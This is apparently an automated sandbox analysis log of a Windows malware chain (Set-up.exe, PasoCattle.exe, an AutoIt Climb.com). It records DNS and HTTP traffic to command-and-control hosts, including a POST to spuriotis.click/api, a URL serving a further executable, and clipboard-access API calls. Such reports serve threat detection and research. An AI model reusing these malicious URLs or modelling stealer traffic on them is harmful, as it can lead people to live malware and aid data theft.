                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ADD889 InternetReadFile,SetEvent,GetLastError,SetEvent,14_2_00ADD889
                Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                Source: global trafficHTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: */*
                Source: global trafficDNS traffic detected: DNS query: httpbin.org
                Source: global trafficDNS traffic detected: DNS query: yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
                Source: global trafficDNS traffic detected: DNS query: home.fortth14ht.top
                Source: global trafficDNS traffic detected: DNS query: spuriotis.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:56:58 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:57:00 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://.css
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://.jpg
                Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                Source: Set-up.exe.0.drString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
                Source: Set-up.exe, 00000003.00000003.2603485994.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001712000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603940005.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.000000000170E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603578861.0000000001709000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2606819261.0000000000AD9000.00000004.00000001.01000000.00000008.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
                Source: Set-up.exe, Set-up.exe, 00000003.00000003.2603485994.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604040691.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001717000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
                Source: Set-up.exe, 00000003.00000003.2603485994.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604040691.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001717000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0798
                Source: Set-up.exe, 00000003.00000003.2603485994.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001712000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603940005.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.000000000170E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603578861.0000000001709000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003ff::3
                Source: Set-up.exe, 00000003.00000002.2606819261.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
                Source: Set-up.exe, 00000003.00000003.2603485994.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001712000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603940005.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.000000000170E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603578861.0000000001709000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://html4/loose.dtd
                Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000002.00000000.2344750367.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007A89000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.drString found in binary or memory: http://timestamp.digicert.com0
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000000.2417281076.0000000000B35000.00000002.00000001.01000000.0000000A.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696506299400400001.2&ci=1696506299033.
                Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696506299400400001.1&ci=1696506299033.12791&cta
                Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
                Source: Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
                Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://httpbin.org/ip
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://httpbin.org/ipbefore
                Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9e
                Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://razaseoexpertinbd.com/Assaac.exe
                Source: TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
                Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/
                Source: Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/&
                Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/.
                Source: Climb.com, 0000000E.00000002.3576789181.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.3576614656.0000000001365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/api
                Source: Climb.com, 0000000E.00000002.3576614656.0000000001365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/apik
                Source: Climb.com, 0000000E.00000002.3576789181.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/apis
                Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/er
                Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/es&
                Source: Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click:443/api
                Source: Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click:443/apiion.txtPK
                Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_cd61a4703a8613be887576f2bd084bcc6f4756dccdbe5062
                Source: Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Fingers.11.dr, PasoCattle.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: Climb.com, 0000000E.00000003.2690876371.0000000003B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
                Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
                Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Climb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49728 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ADF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_00ADF7C7
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_05781000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,14_2_05781000
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ADF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,14_2_00ADF55C
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_004044D1
